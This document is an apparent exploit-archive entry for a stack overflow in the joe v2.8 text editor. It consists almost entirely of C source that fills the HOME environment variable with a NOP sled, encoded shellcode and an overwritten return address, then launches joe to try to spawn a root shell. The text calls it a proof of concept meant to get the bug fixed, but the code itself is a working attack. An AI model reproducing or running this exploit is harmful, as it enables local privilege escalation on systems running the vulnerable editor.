joe v2.8 stack overflow. joe overflows when trying to open() $HOME/.joerc. This is simply proof of concept code, hopefully to get the bug fixed. It will attempt to spawn a rootshell.
92174114b15928ccc797f3ac28878ca4c0229150414ef0e2334636a47b1b6e21
/*
joe v2.8 stack overflow by SectorX of XOR (https://xorteam.cjb.net)
joe overflows when trying to open() $HOME/.joerc, this is simply a proof
of concept, hopefully to get the bug fixed. will attempt to spawn a rootshell.
--sectorx <sectorx@digitalphobia.com>
https://xorteam.cjb.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NOP 0x90
#define BSIZE 1032
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91";
long get_sp() {
__asm__("mov %esp, %eax");
}
int main(int argc, char *argv[])
{
char buffer[BSIZE];
int offset;
long stack = get_sp();
fprintf(stderr,"joe stack overflow by SectorX of XOR\n");
fprintf(stderr,"* offsets can be supplied as a parameter.\n\n");
offset = 0x5dc;
if (argc > 1)
offset = atoi(argv[1]);
memset(&buffer,NOP,BSIZE);
memcpy(buffer+BSIZE-strlen(shellcode)-5,shellcode,strlen(shellcode));
// last 4 bytes overwrites %eip
*(long*)&buffer[BSIZE-4] = stack+offset;
buffer[BSIZE] = '\0';
printf("Using offset 0x%x, return address set to 0x%x\n",offset,stack+offset);
setenv("HOME",buffer,1);
system("joe");
}